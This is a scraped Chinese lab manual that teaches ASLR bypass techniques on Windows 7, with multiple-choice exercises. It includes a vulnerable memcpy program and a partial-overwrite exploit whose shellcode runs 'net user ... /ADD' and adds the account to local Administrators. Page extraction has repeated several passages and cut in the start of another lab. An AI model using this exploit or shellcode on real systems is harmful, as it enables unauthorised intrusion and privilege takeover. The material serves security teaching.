实验指导书

Size: px

Start display at page:

Download "实验指导书"

霄堵
4 years ago
Views:

1 从零开始学习软件漏洞挖掘系列教程第六篇 : 进击 ASLR 地址随机化 1 实验简介实验所属系列 : 系统安全实验对象 : 本科 / 专科信息安全专业相关课程及专业 : 计算机网络实验时数 ( 学分 ):2 学时实验类别 : 实践实验类 2 实验目的通过该实验了解绕过 ASLR 的方法 3 预备知识 1. 关于 ASLR 的一些基础知识 ASLR(Address space layout randomization) 是一种针对缓冲区溢出的安全保护技术, 通过对堆栈共享库映射等线性区布局的随机化, 通过增加攻击者预测目的地址的难度, 防止攻击者直接定位攻击代码位置, 达到阻止溢出攻击的目的 2. 如何配置 ASLR ASLR 的实现需要程序自身的支持和操作系统的双重支持在 Windows Vista 后 ASLR 开始发挥作用同时微软从 VS2005 SP1 开始加入 /dyanmicbase 链接选项帮助程序启用 ASLR 4 实验环境服务器 :Windows 7 SP1,IP 地址 : 随机分配辅助工具 :Immunity Debugger 调试器,mona.py 5 实验步骤

2 前面我们的漏洞利用很多都是基于一个事实 : 硬编码 jmp esp 或 pop pop retn 地址所谓惹不起躲得起, 为微软的 ASLR 技术就是通过加载程序时不再使用固定的基地址, 从而干扰 shellcode 定位的一种技术 ASLR 发挥作用后, 简单的用 jmp esp 或 pop pop retn 的方法将无法利用成功, 因为 jmp esp 或者 pop pop retn 地址每次重启机器都会变化然而攻击者已经用事实告诉我们,ASLR 并非不可绕过我们的任务分为 2 个部分 : 1. 介绍常见的绕过 ASLR 技术 2. 用其中一种技术实战演示 5.1 实验任务一任务描述 : 了解常见绕过 ASLR 技术首先, 在开始之前我想告诉你一件事 :ASLR 只是随机了地址的一部分, 如果你重启后观察加载的模块基地址你会注意到只有地址的高字节随机, 当一个地址保存在内存中, 例如 :0x , 当启用了 ASLR 技术, 只有 : 12 和 34 是随机换句话说,0x 在重启后会变成 0xXXXX5678(XXXX 随机值 ) 在某些情况下, 这可能使黑客利用 / 触发执行任意代码想象一下, 当你攻击一个允许覆盖栈中返回地址的漏洞, 原来固定的返回地址被系统放在栈中, 而如果启用 ASLR, 被随机处理后的地址被放置在栈中, 比方说返回地址是 0x (0x1234 是被随机部分,5678 始终不变 ), 如果我们可以在 XXXX(1234 是随机的, 但嘿 - 操作系统已经把他们放在栈中了 ) 空间中找到有趣的代码 ( 例如 JMP ESP 或其他有用的指令 ) 我们只需要在低字节所表示的地址范围内找到有趣的指令并用这些指令的地址替换掉栈中的低字节让我们看下下面的 test1.exe 程序, 你可以在 C:\ 找到, 在调试器中打开 test1.exe 并查看加载模块的基地址

3 重启并执行相同的操作 :

注意比较这两个图比如重启前的 test 模块加载的基地址是 0x01020000, 重启后 test 模块加载的基地址是 0x012D0000 看到了吧, 只有加载地址的两个高字节被随机化, 所以当你需要使用这些模块的地址时, 无论如何也不能直接使用这些地址, 因为它会在重启后改变常见的绕过 ASLR 技术 : 1.

4 注意比较这两个图比如重启前的 test 模块加载的基地址是 0x , 重启后 test 模块加载的基地址是 0x012D0000 看到了吧, 只有加载地址的两个高字节被随机化, 所以当你需要使用这些模块的地址时, 无论如何也不能直接使用这些地址, 因为它会在重启后改变常见的绕过 ASLR 技术 : 1. 使用未受 ASLR 保护模块的地址地址随机化只会出现在有 ASLR 保护的模块, 如果某个模块没有 ASLR 保护, 那么我们任然可以使用该模块的 jmp esp,pop pop retn 等地址我们可以使用 Immunity Debugger 的 mona.py 插件来查看未开启 aslr 保护的模块, 用 Immunity Debugger 载入 test2.exe, 运行 ( 在 C:\ 可以找到 ) 然后在底部输入 :!mona noaslr 在这个例子中只有我们的 test2.exe 没有 aslr 很多时候程序都自带有许多.dll 文件, 这些文件往往没有 aslr 保护, 你任然可以利用它们里面的地址 2. 利用 Heap spray 技术定位内存地址这种技术的思路就是如果我们可以在应用程序内申请足够大的内存例如申请到的地址覆盖到 0x0c0c0c0c, 那么我们总可以把返回地址覆盖为 0x0c0c0c0c, 然后在 0x0c0c0c0c 放上我们的 shellocde, 程序返回时直接去执行 shellocde, 无视 aslr 3. 猜测随机地址, 暴力破解等等 4. Tombkeeper 在 CanSecWest 2013 上提出的基于 SharedUserData 的方法从 Windows NT 4 到 Windows 8,SharedUserData 的位置一直固定在地址 0x7ffe0000 上从 WRK 源代码中 nti386.h 以及 ntamd64.h 可以看出 : #define MM_SHARED_USER_DATA_VA 0x7FFE0000 在 x86 Windows 上, 通过 Windbg, 可以看到 : 0:001> dt _KUSER_SHARED_DATA SystemCall 0x7ffe0000 ntdll!_kuser_shared_data SystemCall : 0x774364f0 0x7ffe0300 总是指向 KiFastSystemCall 0:001> uf poi(0x7ffe0300) ntdll!kifastsystemcall: f0 8bd4 mov edx,esp f2 0f34 sysenter f4 c3 ret 反汇编 NtUserLockWorkStation 函数, 发现其就是通过 7ffe0300 进入内核的 : 0:001> uf USER32!NtUserLockWorkStation USER32!NtUserLockWorkStation:

5 75f70fad b8e mov eax,11e6h 75f70fb2 ba0003fe7f mov edx,offset SharedUserData!SystemCallStub (7ffe0300) 75f70fb7 ff12 call dword ptr [edx] 75f70fb9 c3 ret 这样, 在触发漏洞前合理布局寄存器内容, 用函数在系统服务 (SSDT / Shadow SSDT) 中服务号填充 EAX 寄存器, 然后让 EIP 跳转到对应的地方去执行, 就可以调用指定的函数了但是也存在很大的局限性 : 仅仅工作于 x86 Windows 上 ; 几乎无法调用有参数的函数 64 位 Windows 系统上 0x7ffe0350 总是指向函数 ntdll!ldrhotpatchroutine HotPatchBuffer 结构体的定义如下 : struct HotPatchBuffer ULONG NotSoSure01; // & != 0 ULONG NotSoSure02; USHORT PatcherNameOffset; // 结构体相对偏移地址 USHORT PatcherNameLen; USHORT PatcheeNameOffset; USHORT PatcheeNameLen; USHORT UnknownNameOffset; USHORT UnknownNameLen ; LdrHotPatchRoutine 调用方式 : void LdrHotPatchRoutine (struct *HotPatchBuffer); 在触发漏洞前合理布局寄存器内容, 合理填充 HotPatchBuffer 结构体的内容, 然后调用 LdrHotPatchRoutine 如果是网页挂马, 可以指定从远程地址加载一个 DLL 文件 ; 如果已经经过其他方法把 DLL 打包发送给受害者, 执行本地加载 DLL 即可此方法通常需要 HeapSpray 协助布局内存数据 ; 且需要文件共享服务器存放恶意 DLL; 只工作于 64 位系统上的 32 位应用程序 ; 不适用于 Windows 8 5. 利用内存信息泄漏通过获取内存中某些有用的信息, 或者关于目标进程的状态信息, 攻击者通过一个可用的指针就有可能绕过 ASLR 这种方法还是十分有效的, 主要原因如下 : (1) 可利用指针检测对象在内存中的映射地址比如栈指针指向内存中某线程的栈空间地址, 或者一静态变量指针可泄露出某一特定 DLL/EXE 的基址 (2) 通过指针推断出其他附加信息比如栈桢中的桢指针不仅提供了某线程栈空间地址, 而且提供了栈桢中的相关函数, 并可通过此指针获得前后栈桢的相关信息再比如一个数据段指针, 通过它可以获得其在内存中的映像地址, 以及单数据元素地址若是堆指针还可获得已分配的数据块地址, 这些信息在程序攻击中还是着为有用的在 Vista 系统的 ASLR 中, 信息泄漏的可用性更广了如果攻击者知道内存中某一映射地址, 那么他不仅可获取对应进程中的 DLL 地址, 连系统中运

6 行的所有进程也会遭殃因为其他进程在重新加载同一 DLL 时, 是通过特定地址上的 _MiImageBitMap 变量来搜索内存中的 DLL 地址的, 而这一 bitmap 又被用于所有进程, 因此找到一进程中某 DLL 的地址, 即可在所有进程的地址空间中定位出该 DLL 地址 6. 部分覆盖返回地址这种技术在 2007 年 3 月的著名的动画光标漏洞 (MS Advisory ) 利用中得到了使用. 这个漏洞是 Alex Sotirov 发现下面的链接介绍了这个漏洞的一些信息 : 和 Metasploit- Exploiting the ANI vulnerability on Vista 这个漏洞的 exploit 第一次在 Vista 上绕过了 ASLR 保护我们下面就演示这种技术练习关于 ASLR, 以下说法正确的是? 单选题 A ASLR 使得每次重新载入程序后基地址都变化 B strcpy 可以控制的地址范围是 0x XXXX0000-0xXXXXFFFF C ASLR 通过随机化基址增加攻击难度 D Heap spray 技术是通过把返回地址覆盖为 0x0c0c0c0c 利用答案 :C 5.2 实验任务二任务描述 : 利用部分覆盖定位内存地址前面我们说过 :ASLR 只是随机了地址的一部分, 如果你重启后观察加载的模块基地址, 你会注意到只有地址的高字节随机比如 0x 这个地址,0x1234 是随机的, 我们不用去管它, 操作系统会帮我们放到栈中, 但 0x5678 是固定的, 那么我们可以覆盖它最后的两个字节, 如果通过 memcpy 函数攻击的话就可以把这个返回地址控制为 0x x1234ffff 中的任意一个如果通过 strcpy 函数攻击, 因为 strcpy 会自动在复制结束后添加 0x00, 所以我们能控制的地址为 0x x123400ff 用于演示这项技术的代码如下 : #include "stdafx.h" #include "windows.h" int test(char *str) char buffer[256]; memcpy(buffer,str,262); _asm lea edx,buffer

7 return 0; int main() test("\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\ x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x 90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x9 0\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\ x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x 90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x9 0\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\ x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x 90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x9 0\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\ x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x 90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x9 0\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\ x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x 90\x90\x90\x90\x90\x90\x90\x90\x90"); //262 字节 _asm jmp edx return 0; 为了方便演示, 我用 vs2010 并且关闭 GS,DEP 编译选项编译, 你可以在 C:\ 找到这个 test3.exe 文件用 Immunity Debugger 载入

8 定位到 test 函数代码注 : 你看到的地址和我的不一样, 因为 aslr 作用注意观察此时 test 函数的返回地址是 0x008D103D, 然后执行到下面的 retn

$你再观察此时的返回地址变成了 0x008D9090, 返回地址前面也被覆盖为 \x909090 也就是说, 我们的输入造成了缓冲区溢出, 刚好把返回地址的低两个字节覆盖为 \x90\x90 了然而前面我们知道, 低两个字节是固定的所以我们可控的返回地址为 0x008D0000 到 0x008DFFFF, 如果我们能在这个地址范围内找到 jmp esp 指令. 但是注意!$

9 你再观察此时的返回地址变成了 0x008D9090, 返回地址前面也被覆盖为 \x 也就是说, 我们的输入造成了缓冲区溢出, 刚好把返回地址的低两个字节覆盖为 \x90\x90 了然而前面我们知道, 低两个字节是固定的所以我们可控的返回地址为 0x008D0000 到 0x008DFFFF, 如果我们能在这个地址范围内找到 jmp esp 指令. 但是注意!!!jmp esp 跳到 shellcode 的办法在这里并不能用因为我们不能覆盖到返回地址的高两个字节以下, 一但覆盖了返回地址的高字节, 那么返回地址我们将不可控, 因为我们硬编码了返回地址, 而这个地址对应的指令是未知的, 因此 shellocde 不能布置在返回地址后面, 所以不能用 jmp esp 的办法跳到 shellcode 显然, 我们可以把 shellcode 放到返回地址前面, 然后把返回地址覆盖为跳到 shellcode 指令的地址如果此时有某个寄存器指向我们的 \x90\x90\x90.. 也就是 buffer 局部变量的起始地址或者起始地址下面, 我们就可以用 jmp 该寄存器指令的地址覆盖返回地址如果你注意看此时的寄存器窗口

10 会发现 EDX=0x0036FA58, 而这个地址正是我们 buffer 的起始地址因此, 我们可以在 0x008D0000-0x008DFFFF 的范围内找到一条 jmp edx 指令, 用 jmp edx 指令地址覆盖返回地址, 就可以成功跳到我们可控的缓冲区很快我在 0x008D1040 找到了一条, 它的高两个字节不用管, 系统会自动帮我们加上

$下面构造我们的 Exploit: 用 \x10\x40 替换我们前面源码的最后两个 \x90\x90, 把 \x10\x40 前面的 \x90 用我们的 shellcode 替换, 不足的用 \x90 填充所以完整的 Exploit 是 : #include "stdafx.h" #include "windows.$

11 下面构造我们的 Exploit: 用 \x10\x40 替换我们前面源码的最后两个 \x90\x90, 把 \x10\x40 前面的 \x90 用我们的 shellcode 替换, 不足的用 \x90 填充所以完整的 Exploit 是 : #include "stdafx.h" #include "windows.h" int test(char *str) char buffer[256]; memcpy(buffer,str,262); _asm lea edx,buffer return 0; int main() test("\x31\xd2\xb2\x30\x64\x8b\x12\x8b\x52\x0c\x8b\x52\x1c\x8b\x42\ x08\x8b\x72\x20\x8b\x12\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03\x78\x3c\x8b\x5 7\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x31\xed\x8b\x34\xaf\x01\xc6\x45\x81\x3e\x 57\x69\x6e\x45\x75\xf2\x8b\x7a\x24\x01\xc7\x66\x8b\x2c\x6f\x8b\x7a\x1c\x01\ xc7\x8b\x7c\xaf\xfc\x01\xc7\x68\x4b\x33\x6e\x01\x68\x20\x42\x72\x6f\x68\x2f\ x41\x44\x44\x68\x6f\x72\x73\x20\x68\x74\x72\x61\x74\x68\x69\x6e\x69\x73\x6 8\x20\x41\x64\x6d\x68\x72\x6f\x75\x70\x68\x63\x61\x6c\x67\x68\x74\x20\x6c\ x6f\x68\x26\x20\x6e\x65\x68\x44\x44\x20\x26\x68\x6e\x20\x2f\x41\x68\x72\x6f \x4b\x33\x68\x33\x6e\x20\x42\x68\x42\x72\x6f\x4b\x68\x73\x65\x72\x20\x68\x 65\x74\x20\x75\x68\x2f\x63\x20\x6e\x68\x65\x78\x65\x20\x68\x63\x6d\x64\x2e \x89\xe5\xfe\x4d\x53\x31\xc0\x50\x55\xff\xd7\x90\x90\x90\x90\x90\x90\x90\x9 0\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\ x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x 90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x9 0\x90\x90\x90\x40\x10"); //262 字节 _asm

12 jmp edx return 0; 你可以在 C 盘找到这个 test4.exe, 运行它似乎 shellcode 没有成功执行我们动态跟踪一下, 用调试器载入, 来到 test 函数

13 到这里看起来都还正常啊, 能执行到我们的 shellcode, 继续往下单步执行

执行到这一句 001BF9CB 202F AND BYTE PTR DS:[EDI],CH 就无法继续, 程序显示发生访问异常原来是我们的 shellcode 出问题了, 现在你所要做的, 就是重新找一个 shellcode 替换前面的 shellcode 就好了到这里, 我们控制了程序流程, 成功绕过 ASLR 然而你会发现, 实际上 ASLR

14 执行到这一句 001BF9CB 202F AND BYTE PTR DS:[EDI],CH 就无法继续, 程序显示发生访问异常原来是我们的 shellcode 出问题了, 现在你所要做的, 就是重新找一个 shellcode 替换前面的 shellcode 就好了到这里, 我们控制了程序流程, 成功绕过 ASLR 然而你会发现, 实际上 ASLR 已经给攻击者造成了非常多的麻烦, 如我们在源码中加入 _asm lea edx,buffer 才使得 EDX 刚好指向我们的 shellocde, 实际中你也许并不能找到某个寄存器指向我们的 shellcode, 也许你足够幸运的话或许有, 这纯考验人品所以当你在绕过 ASLR 中, 发现某个模块没有开启 ASLR( 包括系统模块和程序自带 dll, 但是注意截断符 \x00), 不用想了, 直接用它们

15 练习以下说法不正确的是 : 单选题 A 可以攻击未启用 ASLR 模块绕过 ASLR 保护 B 部分覆盖返回地址绕过 ASLR 技术可以把 shellcode 放在返回地址后面 C 可以覆盖 SEH 异常处理绕过 ASLR D 在 Win7 默认开启了 ASLR 保护机制答案 :B 6 实验报告要求参考实验原理与相关介绍, 完成实验任务, 并对实验结果进行分析, 完成思考题目, 总结实验的心得体会, 并提出实验的改进意见 7 分析与思考 1) 本题如何利用未开启 ASLR 模块绕过 ASLR 机制保护 8 配套学习资源

实验指导书

实验指导书 1 实验简介从零开始学习软件漏洞挖掘系列教程第四篇 : 绕过 GS 机制实验所属系列 : 系统安全实验对象 : 本科 / 专科信息安全专业相关课程及专业 : 计算机网络实验时数 ( 学分 ):2 学时实验类别 : 实践实验类 2 实验目的通过该实验了解绕过 GS 机制的方法, 能够在开启程序 GS 编译的情况下成功利用 3 预备知识 1. 关于 GS 的一些基础知识针对缓冲区溢出覆盖函数返回地址这一特征,